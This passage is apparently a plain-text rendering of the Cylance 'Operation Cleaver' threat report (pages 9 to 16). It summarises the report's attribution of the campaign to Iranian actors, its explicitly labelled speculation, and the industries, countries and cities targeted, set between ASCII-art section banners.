 387. %%%%%%%%%###@@@@ .(.@#@@@   .#/(%@@@&&              .%####%########,   (%@#@#@@@@@%@@@%%@@@@@@@@@@@
 388. #%%%%@@@@@@@@##((@,@*(,(/%%.   ,&/&%##              .###########,   .##&@%@@@@@@@%@@&@&@@@@@@&%%@@%
 389. #@@@@@@@@@@(@@@@@@@%@.#,%.((%%#     ,(              .##%#%%*    .#%%%%%%#@@@%@@%@@@@@@@@@@@@@@@@@@@
 390. @@@@@@((((((@@@@@@@@((#@/, (*(%%%%&.                         &%%%%%%%&@@%#@&@@@@@@@@&@@@@@@@@@@@@@@
 391. @@@@@@%%@@(@@@@@@@(((%%%%%%%* %.%,%%%%               ##////%&/%&@@%@%@@%&%&@@@@&&&@&@@@@@@@@@@@@@@@
 392. &@@(%@@@@@@@@@@@%@%%%%%((%%%%%/#,%%%%%              /////////@@@@@@@@@@@@@@@@@@@@@#%((@@@%@@@#@@@@@
 393. ((((%#@@%@@%##@@#%((%(%((#/////////#&/         ./&%%&&&/@@@@@@@@@@@@@@@@@@@@&@@@@@@@@@@(%%#%%%%%%%%
 394. (###%%%%%@@%@%%%#@@%###%#/////%//@@&(/     (   ./&%%%%&@@@@@@%&/@@((/@@@@@###%@%@@@@@#%@@@@@@#@@%%%
 395. (%%%%%%%%%%%##@@@#%%%%&&&&&&@/@@@@@/@#.%&&(/   ,&/%%%%%%@@@@@///%%////(@%%%%%%%%@@@%%@@@@@@@@@@%%%%
 396. #@@%%%%%%%%%%%%%%%@@@@@@@@@@@@@@@@@&%%%%%%%%   .%@//(////////////////////@&%@%@@/@###%%%%((((((%%((
 397. %%%%%%%%%%%%%%%@@@@@@@@@@@@@@/@@@@#%%%%%%%%%   ,@@@@&%@@@%//%////%/%%%%/@#@@@@@/@//@@@/%%%%%(((((%@
 398. %%%%%%%%%%(%@@@@#%#(#((((@@(%%%%%%%%%@#@@     (@@@@@@@%@#@&%%%@@@@@@@@%&@@@@@///@@@#%%%(#%%%(#%%%
 399. #%%%####(%%%@@@@(%(%(((((((((##%%%%%@@@@@@#******%&%%&&%&@@@@@@@@@@@@@@@@%%&@@@@@@@%%@%%@%%%%%%(%((
 400. (%((%@##@@@%%((%%((((((((#####(&%%#@%#%%@@%%% (##@%%%%%%%&@@@@@@@@@@@@@@@@@@@@%@@@&&@%@@@@@@@@%%@((
 401. (((((%%%@@%#((#%%%%@((((((%%#(#%%%%%%(((%,       .%%%%%%@@@@@@@@@@@@@@@@@@@@@@%@@@@@@@@@@@@@@@@@@@@
 402. (((#((((%((%%%@@#@@@((((((@@%(%(%%%@@%%((         *@@@%&@@@@@@@@@@#@@@#%@@@@@@@@@@@@@@@@@@@@@@@@@@@
 403. ##((#(###(@@@@@@@@@@@@#((@@%%%%%%%%%%%%((         ,@@#@@@@@@@@@@@@%@@@&%%#@@@@@@@@@@@@@@@@@@@@@@@@@
 404. %%%%%%%%%%#@@@%@@%@@@#(%%%(##%%#(##%%((((         ,@&@@@@@@@@@@@@@@@&&@%@@@@%%@@@@@@@@@@@@@@@@@@@@&
 405. @@@@@@@@@@@&@@@@@%%&@%@(((%%%%%%((((((((%     ... ,@@@@@@@@@@@(#%%%%%%#%%%%%%@#@%%%%%((%@@@@@@@%%%%
 406. @@@@@@@@@@@@@@@@@@#(@@@@@(%%%%%((((%%((((((      @@@@@&%&@@@#(#%%%%%%%%%%#@@@@#%%%%%%%%%%%%##@@@(%%
 407. %@@&%@@%%%@@@@@@%@(((((@((((#((#(%%%%%%%%%(      @@@&%%%@@@@%%%%@@%%%%#&%%%@&%%%%%%%%%%%%%((%%%%%%%
 408. //#(%%%%%@@@@%%(((((((((((((((((%(#%%%##(##..,,, @@@&%@@@%%@@@@@@@%%%%%%%%%%%%%%%%@%%%%%%%((%%@@@%@
 409. /#((/#%#(%%@(((%(%%%%%((((((#(((%%%%#(((%//..*** @@@@@@@@@#%%@%%%%%%%%%%%%%%@#%%%%%%%((((((((((((((
 410.  
 411. [ PG-9  Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
 412.  
 413.  
 414.  
 415. [CYLANCE                                                                                  #OPCLEAVER]
 416.  
 417. CRITICAL  DISCOVERIES
 418.  
 419. Iranian Actors Are Behind Operation Cleaver
 420.  
 421. *       Persian hacker names are used throughout the campaign including: Salman Ghazikhani,
 422.         Bahman Mohebbi, Kaj, Parviz, Alireza, and numerous others.
 423. *       Numerous domains used in the campaign were registered in Iran.
 424. *       Infrastructure leveraged in the attack was registered in Iran to the corporate entity
 425.         Tarh Andishan, which translates to “invention” or “innovation” in Farsi.
 426. *       Source netblocks and ASNs are registered to Iran.
 427. *       Hacker tools warn when their external IP address traces back to Iran.
 428. *       The infrastructure is hosted through Netafraz.com, an Iranian provider out of Isfahan, Iran.
 429. *       The infrastructure utilized in the campaign is too significant to be a lone individual or a small
 430.         group. We believe this work was sponsored by Iran.
 431.  
 432.  
 433. Operation Cleaver Targets Critical Infrastructure Around the World
 434.  
 435. *       US Military targets including NMCI in October 2013.5 Confirmed targeting of global government
 436.         entities.
 437. *       Networks and systems targeted in critical industries like energy and utilities, oil and gas,
 438.         and chemical companies.
 439. *       Assets (both cyber and physical) and logistics information were compromised at major airline
 440.         operators, airports, and transportation companies.
 441. *       Various global telecommunications, technology, healthcare, aerospace, and defense companies
 442.         were breached as part of the operation.
 443. *       Confidential critical infrastructure documents were harvested from major educational
 444.         institutions around the world.
 445.  
 446. Iran’s Cyber Hacking Skills Have Evolved
 447.  
 448. *       Initial compromise techniques include SQL injection, web attacks, and creative deception-based
 449.         attacks – all of which have been implemented in the past by Chinese and Russian hacking teams.
 450. *       Pivoting and exploitation techniques leveraged existing public exploits for MS08-067 and Windows
 451.         privilege escalations, and were coupled with automated, worm-like propagation mechanisms.
 452. *       Customized private tools with functions that include ARP poisoning, encryption, credential
 453.         dumping, ASP.NET shells, web backdoors, process enumeration, WMI querying, HTTP and SMB
 454.         communications, network interface sniffing, and keystroke logging.
 455. *       The ability to build customized tools to compromise any target they choose.
 456.  
 457. [ PG-10 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
 458.  
 459.  
 460.  
 461. [CYLANCE                                                                                  #OPCLEAVER]
 462.  
 463. Indicators of Compromise (IOC)
 464.  
 465. *       Private signing certificates of one victim were captured allowing the Operation Cleaver team to
 466.         compromise the entirety of their organization.
 467. *       Over the past two years, Cylance has collected over 8GB of data including over 80,000 files of
 468.         exfiltrated data, hacker tools, victim logs, and highly sensitive reconnaissance data.
 469. *       Data from sinkholed command and control servers has allowed us to track this active campaign.
 470. *       Cylance is releasing more than 150 IOCs and samples associated with the Cleaver campaign to
 471.         empower the security community to detect existing compromises in their own organizations,
 472.         as well as potentially block future attacks from these teams.
 473.  
 474. Speculation
 475.  
 476. *       This campaign continues Iran’s retaliation for Stuxnet, Duqu, and Flame.
 477. *       This is a state-sponsored campaign.
 478. *       There is a possibility that this campaign could affect airline passenger safety.
 479. *       This campaign’s intentions may be to damage Industrial Control Systems (ICS), Supervisory Control
 480.         and Data Acquisition (SCADA) systems, and impact Critical Infrastructure and Key Resources (CIKR).
 481. *       This campaign could be a way to demonstrate Iran’s cyber capabilities for additional geopolitical
 482.         leverage, due to the breadth and depth of their global targets.
 483. *       There is an intense focus on CIKR companies in South Korea, which could give Iran additional clout
 484.         in their burgeoning partnership with North Korea. In September 2012, Iran signed an extensive
 485.         agreement for technology cooperation agreement with North Korea, which would allow for
 486.         collaboration on various efforts including IT and security.6
 487. *       Iran is recruiting from within the universities and potentially using ‘hackers for hire’.7
 488.  
 489. [ PG-11 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
 490.  
 491.  
 492.  
 493. [CYLANCE                                                                                  #OPCLEAVER]
 494. @@@@@@@@@@@@@@@@@@@@@@@@###@@@@(((@@@@@@@@@@@%%#@@@@@@@%###%##%&@@@@@@@@@@@@@@@@@@@@@@@@@%%%%%%%%%%
 495. %#####%%#@@&%%@@@@#%%%%%%%%((%#&@@#%%@@@@@#%%%%@@@#@@@@@@@###%#@@@@@@/@&%%@@@@@@@@@@&@@@@@%#@@@%@@%
 496. %#%%%%%%%%@@@%%%@@#%%%%%%%%         TARGETS & VICTIMS        @@%%%%%(((@@@@%##@#@@%&@%&@@@@%@@%%@@@
 497. #%%%%%%@@@@@@@(/%%%%%%%%%(((%%%%@@@@#####@@&&%/,,@&*/@&@@@###@##%#@@@@@@@@@%%@@%%@@@@@@@##@@@@@@@@&
 498. (%%%%#@@@@#%@@#%%%%%%%%%%%%(%%(/@@/@/#%/%((/#(@(@@.(,@((&@&(.%%%#@@@@@%@@@@@@@@@@@@@@%%(@@@####@@%%
 499. #@@@@@@@@@/(((#%%%%%%%%%(%%%%%###%,%%,@%/(/#@/@.@@/*###,%(@/%*/(%@&@%@@@@@@@@@@@@@@%    %%%%%%%%%%%
 500. @@@@@@@@@@@%%((&%%@#%#@@%&((,*(.%.%,#%%%%%/,,      .,(&%%#((#*.**(@#@@@@@@@@@@@@.        /########%
 501. @#&(#&(###@###(///@&&(.%.&(%%#&,       .,**//**,.       .#######@@&@&&%             @@@@@&%@@
 502. %%%%(%%%%%%%%&(((((((.%(( (.%%%.    *#%%%%%%%%%%%%%#%##*(((,    .#(%#(##(/                 @@@@%%#@
 503. %%%%%%#####%/(#(((((.(.(,%%%    ,%%%%%%%%%#(*/*%%%###%###%%.,(#*    (&                     .&&&&&&&
 504. (%%%%%%%%(((((%%%%,(((%   ,%%/%@@/#@@@(@@%%%##%%%##%%%%%%%%/%%##.                          %%%%%%
 505. (((((((((%%#(((&%%%*%%%   ##//%#,.#@@&&@@@/#%%%%%%%%*#//**(                              ,%%%%@
 506. #(#@(####((%((#@(%%%%   ##%%#(#//%&@%%#(/&@###*#%%%%%%%%#%#*                                  .%%##
 507. %%@@@@@(((((%%#%.@@.  #%%&@&/@&&&%%%%##*%#(*(%%%%%%%%%%%.                                      *###
 508. #(((((#%%%(##,@(%@  *@@#/((/*%/(%((&/(%##/#%%%%%%@@%&                                           (##
 509. (#%%%%%%%@,/&%&@(  @&@@@@&%%/#%#/%///@%%%%%%%%@@&(                                        ,//*  /##
 510. (####(#%%,.#%&@#  @@@@@@@&&@@&&#,&@&%%%%%#//%%%//                                             ///
 511. ((((###(&((%*@/  %%%@@%%%%%%%/*/%%%%%%@@%%(/////////(                                        ((((((
 512. ##%%%%#@#*.(#/   %%%%%%&@%%%%/,,%%%%&@@@@@@@@(#@@@@(//                               ,#%%@%%&//%%%%
 513. ######%@. ,#%   (%%%%%%%%,(&@@@@@&@@@@@@@@@@@/#@    @(%/                        ,  %%%%#((((//////%
 514. %%%%%%(%.#,%(  (%%///%%#/%%&@@@#@/&@@@@#  /,  ,#    #%(#(                  *(&*#,. %###/(///(//////
 515. %%%%%%%%  %%  *(%/%%#/%@@&@@&@@@@%@@@@%   /    ..((,../*/              ,((@@@%/%#/ .///%/%(/%%@@@@@
 516. %%%%%%*%,@%%  ((#(###@@@@@@@&%/&@@@#  *   #   #.        .(         .#@@@%##@#%//  /%%/%/#%%&/@#%&
 517. %%%%%%%%*%@#  %%%&@%@@@@%%%%&%&%&%%   (   %   (.   ,      (     (#&&%%%%%%%(*%#&/(  (////%%@@/((&@@
 518. %%%%%%*.%*((  ##%%((@@######%&%%%   #   #    %   *(      / #%%%&@@@%%%%%%%%/####  *//@@@@@@//@@##
 519. %%%%%%&&(/((  @@%%%#&@%#@@@@@@&   (   #   .*    .#     (@&%%@@@@@%%%%%%%%(%%%/  /%%%%@%@@%/###(
 520. %%%%%%(&*(((  &@@@&%((((&@@@@@@@@,*   #  .%#((.  .#        &@@@@@@@@@@@%%%%%%%%%%%  %%%%%%%%%@/%@@@
 521. %%%%@@/#@@*@  /@@@%@@#@@@@@@@@@  &@,        /         ,@@@@@@@@@@@@@%@@@/%%%%( .%%%%%%%%%%%%%%@
 522. %%%@@@@, &@@(  &@@@@%@@@@@#(%&/(% (*          (.          (#/((@@@@@@@@%&&(%%%%. %#%%%%%%%@%%&@@@
 523. %%@&@@@,@,@%@. ,@@@@%@@@@(((%&@#            .%          /#%%%%%%/&&&@@@@@@#(#&/  @(#%%%%#(#%%%%@@
 524. %%%&%@@@,@&&@@  @@@@@#@@@&@@%            .%%%,        *# /#%#%##%(#@@@@@@@@%%,%%  (@##%%%%%%%#@
 525. %%%%#@@@@**%/  @@@@%#@@@@@,          /.  *%       (/  #%%###%@@@(@@@@@@%(/(%(  ,%%%%%#%%%%%%%%%%%
 526. %%%%%%%%%%%.%,@#  @@@@@&@@@@&       .(       #    (/   ###%%%##%%%@@@@&%/*/,/(  *%%#%#%%%%%@@%%%%%%
 527. %%%&@@#@@%## (%%(  @@@@%@@@@@%   .(%    ###(,         %%%%%%%%%%%/%%%@%/*&&@&  ,%%%%#%%#%%%%%%%%@@%
 528. %%%%%#@@%@@%,/@*%#  %@@@@%@@@@@@&@@@&%               %%%%%%%%%%%%%#%%%%(#%%/  ,%%%%%#@@@@@@@@@@@@@@
 529. %@@&%%%%%%%%@@%,/((,  (##%#%&@@@@@@#(#              .%%%@%%%%%%%%%/#/%@@@%   %%%%%%@@@@@@@@@@@@@@@@
 530. %##%%%%%%@@%#*#* (&%(   #%#*&@@@@@#@@@              .%%%%%#(((%%%%%####%   ###%%%%@@@@@&@@@@@@@@@@@
 531. %%%%%%%%%@%(#@%@**(.(%%   (#((#**#@@@&              .#######/########(   *%%%@&%&&@@&@@@@&@@@@@@@@@
 532. %%%%%%%%%###@@@@ .(.@#@@@   .#/(%@@@&&              .%####%########,   (%@#@#@@@@@%@@@%%@@@@@@@@@@@
 533. #%%%%@@@@@@@@##((@,@*(,(/%%.   ,&/&%##              .###########,   .##&@%@@@@@@@%@@&@&@@@@@@&%%@@%
 534. #@@@@@@@@@@(@@@@@@@%@.#,%.((%%#     ,(              .##%#%%*    .#%%%%%%#@@@%@@%@@@@@@@@@@@@@@@@@@@
 535. @@@@@@((((((@@@@@@@@((#@/, (*(%%%%&.                         &%%%%%%%&@@%#@&@@@@@@@@&@@@@@@@@@@@@@@
 536. @@@@@@%%@@(@@@@@@@(((%%%%%%%* %.%,%%%%               ##////%&/%&@@%@%@@%&%&@@@@&&&@&@@@@@@@@@@@@@@@
 537. &@@(%@@@@@@@@@@@%@%%%%%((%%%%%/#,%%%%%              /////////@@@@@@@@@@@@@@@@@@@@@#%((@@@%@@@#@@@@@
 538. ((((%#@@%@@%##@@#%((%(%((#/////////#&/         ./&%%&&&/@@@@@@@@@@@@@@@@@@@@&@@@@@@@@@@(%%#%%%%%%%%
 539. (###%%%%%@@%@%%%#@@%###%#/////%//@@&(/     (   ./&%%%%&@@@@@@%&/@@((/@@@@@###%@%@@@@@#%@@@@@@#@@%%%
 540. (%%%%%%%%%%%##@@@#%%%%&&&&&&@/@@@@@/@#.%&&(/   ,&/%%%%%%@@@@@///%%////(@%%%%%%%%@@@%%@@@@@@@@@@%%%%
 541. #@@%%%%%%%%%%%%%%%@@@@@@@@@@@@@@@@@&%%%%%%%%   .%@//(////////////////////@&%@%@@/@###%%%%((((((%%((
 542. %%%%%%%%%%%%%%%@@@@@@@@@@@@@@/@@@@#%%%%%%%%%   ,@@@@&%@@@%//%////%/%%%%/@#@@@@@/@//@@@/%%%%%(((((%@
 543. %%%%%%%%%%(%@@@@#%#(#((((@@(%%%%%%%%%@#@@     (@@@@@@@%@#@&%%%@@@@@@@@%&@@@@@///@@@#%%%(#%%%(#%%%
 544. #%%%####(%%%@@@@(%(%(((((((((##%%%%%@@@@@@#******%&%%&&%&@@@@@@@@@@@@@@@@%%&@@@@@@@%%@%%@%%%%%%(%((
 545. (%((%@##@@@%%((%%((((((((#####(&%%#@%#%%@@%%% (##@%%%%%%%&@@@@@@@@@@@@@@@@@@@@%@@@&&@%@@@@@@@@%%@((
 546. (((((%%%@@%#((#%%%%@((((((%%#(#%%%%%%(((%,       .%%%%%%@@@@@@@@@@@@@@@@@@@@@@%@@@@@@@@@@@@@@@@@@@@
 547. (((#((((%((%%%@@#@@@((((((@@%(%(%%%@@%%((         *@@@%&@@@@@@@@@@#@@@#%@@@@@@@@@@@@@@@@@@@@@@@@@@@
 548. ##((#(###(@@@@@@@@@@@@#((@@%%%%%%%%%%%%((         ,@@#@@@@@@@@@@@@%@@@&%%#@@@@@@@@@@@@@@@@@@@@@@@@@
 549. %%%%%%%%%%#@@@%@@%@@@#(%%%(##%%#(##%%((((         ,@&@@@@@@@@@@@@@@@&&@%@@@@%%@@@@@@@@@@@@@@@@@@@@&
 550. @@@@@@@@@@@&@@@@@%%&@%@(((%%%%%%((((((((%     ... ,@@@@@@@@@@@(#%%%%%%#%%%%%%@#@%%%%%((%@@@@@@@%%%%
 551. @@@@@@@@@@@@@@@@@@#(@@@@@(%%%%%((((%%((((((      @@@@@&%&@@@#(#%%%%%%%%%%#@@@@#%%%%%%%%%%%%##@@@(%%
 552. %@@&%@@%%%@@@@@@%@(((((@((((#((#(%%%%%%%%%(      @@@&%%%@@@@%%%%@@%%%%#&%%%@&%%%%%%%%%%%%%((%%%%%%%
 553. //#(%%%%%@@@@%%(((((((((((((((((%(#%%%##(##..,,, @@@&%@@@%%@@@@@@@%%%%%%%%%%%%%%%%@%%%%%%%((%%@@@%@
 554. /#((/#%#(%%@(((%(%%%%%((((((#(((%%%%#(((%//..*** @@@@@@@@@#%%@%%%%%%%%%%%%%%@#%%%%%%%((((((((((((((
 555. [ PG-12 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
 556.  
 557.  
 558.  
 559. [CYLANCE                                                                                  #OPCLEAVER]
 560.  
 561. TARGETS & VICTIMS
 562.  
 563. The Cleaver team targets some of the most sensitive global critical infrastructure companies in the
 564. world, including military, oil and gas, airlines, airports, energy producers, utilities,
 565. transportation, healthcare, telecommunications, technology, manufacturing, education, aerospace,
 566. Defense Industrial Base (DIB), chemical companies and governments. Countries impacted include
 567. Canada, China, England, France, Germany, India, Israel, Kuwait, Mexico, Pakistan, Qatar,
 568. Saudi Arabia, South Korea, Turkey, United Arab Emirates, and the US.
 569.  
 570. The following is a breakdown by country of which industries were targeted and/or victimized:
 571.  
 572. Canada                                  Kuwait                                  South Korea
 573. -Energy & Utilities                     -Oil & Gas                              -Airports
 574. -Oil & Gas                              -Telecommunications                     -Airlines
 575. -Hospitals                                                                      -Education
 576.                                         Mexico                                  -Technology
 577. China                                   -Oil & Gas                              -Heavy Manufacturing
 578. -Aerospace
 579.                                         Pakistan                                Turkey
 580.                                         -Airports                               -Oil & Gas
 581. England                                 -Hospitals
 582. -Education                              -Technology
 583.                                         -Airlines                               United Arab Emirates
 584.                                                                                 -Government
 585. France                                                                          -Airlines
 586. -Oil & Gas                              Qatar
 587.                                         -Oil & Gas
 588.                                         -Government
 589. Germany                                 -Airlines
 590. -Telecommunications                                                             United States
 591.                                                                                 -Airlines
 592. India                                                                           -Education
 593. -Education                              Saudi Arabia                            -Chemicals
 594.                                         -Oil & Gas                              -Transportation
 595. Israel                                  -Airports                               -Energy & Utilities
 596. -Aerospace                                                                      -Military/Government
 597. -Education                                                                      -Defense Industrial Base
 598.  
 599. [ PG-13 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
 600.  
 601.  
 602.  
 603. [CYLANCE                                                                                  #OPCLEAVER]
 604.  
 605. Cleaver’s level of access into each organization varied greatly, including completely compromised
 606. systems and networks, Active Directory domain controllers and credentials, compromised data
 607. repositories and stolen VPN credentials.
 608.  
 609. Compromised systems include Microsoft Windows web servers running IIS and ColdFusion, Apache with PHP,
 610. many variants of Microsoft Windows desktops and servers, and Linux servers. Compromised network
 611. infrastructure included Cisco VPNs as well as Cisco switches and routers. Unlike Stuxnet, no exotic
 612. exploitations (such as 0-days) were observed.
 613.  
 614. Within our investigation, we had no direct evidence of a successful compromise of specific Industrial
 615. Control Systems (ICS) or Supervisory Control and Data Acquisition (SCADA) networks, but Cleaver did
 616. exfiltrate extremely sensitive data from many critical infrastructure companies allowing them to
 617. directly affect the systems they run. This data could enable them, or affiliated organizations, to
 618. target and potentially sabotage ICS and SCADA environments with ease.
 619.  
 620. We discovered over 50 victims in our investigation, distributed around the globe. Ten of these victims
 621. are headquartered in the US and include a major airline, a medical university, an energy company
 622. specializing in natural gas production, an automobile manufacturer, a large defense contractor, and a
 623. major military installation. The four targets in Israel and the five targets in Pakistan are comprised
 624. of education, aerospace, airports, airlines, healthcare and technology. Further victims were identified
 625. in numerous Middle Eastern countries as well as ones in Northern Europe including the UK, France, and
 626. Germany. Central America was not immune either with a large oil and gas company on the list. In fact,
 627. oil and gas was a particular focal point for the Cleaver team, going after no less than nine of these
 628. companies around the world.
 629.  
 630. Universities were targeted in the US, India, Israel, and South Korea. The attackers targeted research
 631. efforts, student information, student housing, and financial aid systems. They had a penchant for
 632. pictures, passports, and any specifc identifying information.
 633.  
 634. Perhaps the most bone-chilling evidence we collected in this campaign was the targeting and compromise
 635. of transportation networks and systems such as airlines and airports in South Korea, Saudi Arabia and
 636. Pakistan. The level of access seemed ubiquitous: Active Directory domains were fully compromised,
 637. along with entire Cisco Edge switches, routers, and internal networking infrastructure. Fully
 638. compromised VPN credentials meant their entire remote access infrastructure and supply chain was under
 639. the control of the Cleaver team, allowing permanent persistence under compromised credentials.
 640. They achieved complete access to airport gates and their security control systems, potentially
 641. allowing them to spoof gate credentials. They gained access to PayPal and Go Daddy credentials allowing
 642. them to make fraudulent purchases and allowed unfettered access to the victim’s domains. We were
 643. witnessed a shocking amount of access into the deepest parts of these companies and the airports in
 644. which they operate.
 645.  
 646. [ PG-14 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
 647.  
 648.  
 649.  
 650. [CYLANCE                                                                                  #OPCLEAVER]
 651.  
 652. TARGET LOCATIONS
 653.  
 654.  
 655. 1.Canada - Calgary              13.Mexico - Mexico City         25.UAE - Abu Dhabi
 656. 2.Canada - Hamilton             14.Pakistan - Karachi (2)       26.UAE - Al Garhoud
 657. 3.China - Beijing               15.Pakistan - Lahore            27.USA - California - Los Angeles(2)
 658. 4.England - Oxford              16.Pakistan - Multan            28.USA - California - San Diego
 659. 5.France - Paris                17.Pakistan - Peshawar          29.USA - California - San Jose
 660. 6.Germany - Dusseldorf          18.Qatar - Doha (4)             30.USA - Michigan - Dearborn
 661. 7.Germany - Frankfurt           19.Saudi Arabia - Dhahran       31.USA - Texas  - Houston (2)
 662. 8.India - New Delhi (2)         20.Saudi Arabia - Jeddah                32.USA - Texas  - Fort Worth
 663. 9.Israel - Haifa (3)            21.South Korea - Incheon                33.USA - Texas  - Southlake
 664. 10.Israel - Rehovot             22.South Korea - Goyang-si      34.USA - Virginia - Fairfax
 665. 11.Kuwait - Ahmadi              23.South Korea - Seoul (7)      35.USA - Virginia - McLean
 666. 12.Kuwait - Kuwait City         24.Turkey - Antalya
 667.  
 668. [ PG-15 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
 669.  
 670.  
 671.  
 672. [CYLANCE                                                                                  #OPCLEAVER]
 673.  
 674. [PRETTY CHART]
 675.  
 676. Figure 2: Geographic distribution of victims, as determined by the global headquarters of the parent
 677. company or organization breached.
 678.  
 679.  
 680. [ PG-16 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
 681.  
 682.  
 683.  
 684. [CYLANCE                                                                                  #OPCLEAVER]
 685.  
 686. @@@@@@@@@@@@@@@@@@@@@@@@###@@@@(((@@@@@@@@@@@%%#@@@@@@@%###%##%&@@@@@@@@@@@@@@@@@@@@@@@@@%%%%%%%%%%
 687. %#####%%#@@&%%@@@@#%%%%%%%%((%#&@@#%%@@@@@#%%%%@@@#@@@@@@@###%#@@@@@@/@&%%@@@@@@@@@@&@@@@@%#@@@%@@%
 688. %#%%%%%%%%@@@%%%@@#%%%%%%%%             ATTRIBUTION          @@%%%%%(((@@@@%##@#@@%&@%&@@@@%@@%%@@@
 689. #%%%%%%@@@@@@@(/%%%%%%%%%(((%%%%@@@@#####@@&&%/,,@&*/@&@@@###@##%#@@@@@@@@@%%@@%%@@@@@@@##@@@@@@@@&
 690. (%%%%#@@@@#%@@#%%%%%%%%%%%%(%%(/@@/@/#%/%((/#(@(@@.(,@((&@&(.%%%#@@@@@%@@@@@@@@@@@@@@%%(@@@####@@%%
 691. #@@@@@@@@@/(((#%%%%%%%%%(%%%%%###%,%%,@%/(/#@/@.@@/*###,%(@/%*/(%@&@%@@@@@@@@@@@@@@%    %%%%%%%%%%%
 692. @@@@@@@@@@@%%((&%%@#%#@@%&((,*(.%.%,#%%%%%/,,      .,(&%%#((#*.**(@#@@@@@@@@@@@@.        /########%
 693. @#&(#&(###@###(///@&&(.%.&(%%#&,       .,**//**,.       .#######@@&@&&%             @@@@@&%@@
 694. %%%%(%%%%%%%%&(((((((.%(( (.%%%.    *#%%%%%%%%%%%%%#%##*(((,    .#(%#(##(/                 @@@@%%#@
 695. %%%%%%#####%/(#(((((.(.(,%%%    ,%%%%%%%%%#(*/*%%%###%###%%.,(#*    (&                     .&&&&&&&
 696. (%%%%%%%%(((((%%%%,(((%   ,%%/%@@/#@@@(@@%%%##%%%##%%%%%%%%/%%##.                          %%%%%%
 697. (((((((((%%#(((&%%%*%%%   ##//%#,.#@@&&@@@/#%%%%%%%%*#//**(                              ,%%%%@
 698. #(#@(####((%((#@(%%%%   ##%%#(#//%&@%%#(/&@###*#%%%%%%%%#%#*                                  .%%##
 699. %%@@@@@(((((%%#%.@@.  #%%&@&/@&&&%%%%##*%#(*(%%%%%%%%%%%.                                      *###
 700. #(((((#%%%(##,@(%@  *@@#/((/*%/(%((&/(%##/#%%%%%%@@%&                                           (##
 701. (#%%%%%%%@,/&%&@(  @&@@@@&%%/#%#/%///@%%%%%%%%@@&(                                        ,//*  /##
 702. (####(#%%,.#%&@#  @@@@@@@&&@@&&#,&@&%%%%%#//%%%//                                             ///
 703. ((((###(&((%*@/  %%%@@%%%%%%%/*/%%%%%%@@%%(/////////(                                        ((((((
 704. ##%%%%#@#*.(#/   %%%%%%&@%%%%/,,%%%%&@@@@@@@@(#@@@@(//                               ,#%%@%%&//%%%%
 705. ######%@. ,#%   (%%%%%%%%,(&@@@@@&@@@@@@@@@@@/#@    @(%/                        ,  %%%%#((((//////%
 706. %%%%%%(%.#,%(  (%%///%%#/%%&@@@#@/&@@@@#  /,  ,#    #%(#(                  *(&*#,. %###/(///(//////
 707. %%%%%%%%  %%  *(%/%%#/%@@&@@&@@@@%@@@@%   /    ..((,../*/              ,((@@@%/%#/ .///%/%(/%%@@@@@
 708. %%%%%%*%,@%%  ((#(###@@@@@@@&%/&@@@#  *   #   #.        .(         .#@@@%##@#%//  /%%/%/#%%&/@#%&
 709. %%%%%%%%*%@#  %%%&@%@@@@%%%%&%&%&%%   (   %   (.   ,      (     (#&&%%%%%%%(*%#&/(  (////%%@@/((&@@
 710. %%%%%%*.%*((  ##%%((@@######%&%%%   #   #    %   *(      / #%%%&@@@%%%%%%%%/####  *//@@@@@@//@@##
 711. %%%%%%&&(/((  @@%%%#&@%#@@@@@@&   (   #   .*    .#     (@&%%@@@@@%%%%%%%%(%%%/  /%%%%@%@@%/###(
 712. %%%%%%(&*(((  &@@@&%((((&@@@@@@@@,*   #  .%#((.  .#        &@@@@@@@@@@@%%%%%%%%%%%  %%%%%%%%%@/%@@@
 713. %%%%@@/#@@*@  /@@@%@@#@@@@@@@@@  &@,        /         ,@@@@@@@@@@@@@%@@@/%%%%( .%%%%%%%%%%%%%%@
 714. %%%@@@@, &@@(  &@@@@%@@@@@#(%&/(% (*          (.          (#/((@@@@@@@@%&&(%%%%. %#%%%%%%%@%%&@@@
 715. %%@&@@@,@,@%@. ,@@@@%@@@@(((%&@#            .%          /#%%%%%%/&&&@@@@@@#(#&/  @(#%%%%#(#%%%%@@
 716. %%%&%@@@,@&&@@  @@@@@#@@@&@@%            .%%%,        *# /#%#%##%(#@@@@@@@@%%,%%  (@##%%%%%%%#@
 717. %%%%#@@@@**%/  @@@@%#@@@@@,          /.  *%       (/  #%%###%@@@(@@@@@@%(/(%(  ,%%%%%#%%%%%%%%%%%
 718. %%%%%%%%%%%.%,@#  @@@@@&@@@@&       .(       #    (/   ###%%%##%%%@@@@&%/*/,/(  *%%#%#%%%%%@@%%%%%%
 719. %%%&@@#@@%## (%%(  @@@@%@@@@@%   .(%    ###(,         %%%%%%%%%%%/%%%@%/*&&@&  ,%%%%#%%#%%%%%%%%@@%
 720. %%%%%#@@%@@%,/@*%#  %@@@@%@@@@@@&@@@&%               %%%%%%%%%%%%%#%%%%(#%%/  ,%%%%%#@@@@@@@@@@@@@@
 721. %@@&%%%%%%%%@@%,/((,  (##%#%&@@@@@@#(#              .%%%@%%%%%%%%%/#/%@@@%   %%%%%%@@@@@@@@@@@@@@@@
 722. %##%%%%%%@@%#*#* (&%(   #%#*&@@@@@#@@@              .%%%%%#(((%%%%%####%   ###%%%%@@@@@&@@@@@@@@@@@
 723. %%%%%%%%%@%(#@%@**(.(%%   (#((#**#@@@&              .#######/########(   *%%%@&%&&@@&@@@@&@@@@@@@@@
 724. %%%%%%%%%###@@@@ .(.@#@@@   .#/(%@@@&&              .%####%########,   (%@#@#@@@@@%@@@%%@@@@@@@@@@@
 725. #%%%%@@@@@@@@##((@,@*(,(/%%.   ,&/&%##              .###########,   .##&@%@@@@@@@%@@&@&@@@@@@&%%@@%
